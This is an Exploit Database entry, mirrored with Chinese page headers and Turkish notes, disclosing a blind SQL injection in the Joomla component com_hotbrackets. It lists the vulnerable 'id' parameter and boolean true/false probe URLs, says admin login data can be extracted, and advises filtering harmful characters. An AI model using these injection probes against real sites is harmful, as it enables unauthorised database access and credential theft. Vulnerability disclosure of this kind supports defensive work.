Joomla! Component com_hotbrackets – Blind SQL Injection

• Exploit Database
• 11 阅读

• 作者： FL0RiX
  日期： 2010-01-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/10953/

• <------------------- header data start ------------------- >
  
  #############################################################
  # Joomla Component com_hotbrackets Blind SQL injection Vulnerability
  #############################################################
  
  # author: Fl0riX
  
  # Name : com_hotbrackets
  
  # Bug Type : Blind SQL Injection
  
  # Infection: Admin login bilgileri al&#305;nabilir.
  
  # Demo Vuln. :
  TRUE(+)
  » http://server/index.php?option=com_hotbrackets&id=1 and 1=1
  FALSE(-)
  » http://server/index.php?option=com_hotbrackets&id=1 and 1=0
  
  # Bug Fix Advice : Zararl&#305; karakterler filtrelenmelidir.
  
  #############################################################
  
  < ------------------- header data end of ------------------- >
  
  < -- bug code start -- >
  
  path/index.php?option=com_hotbrackets&id=[Blind]
  
  < -- bug code end of -- >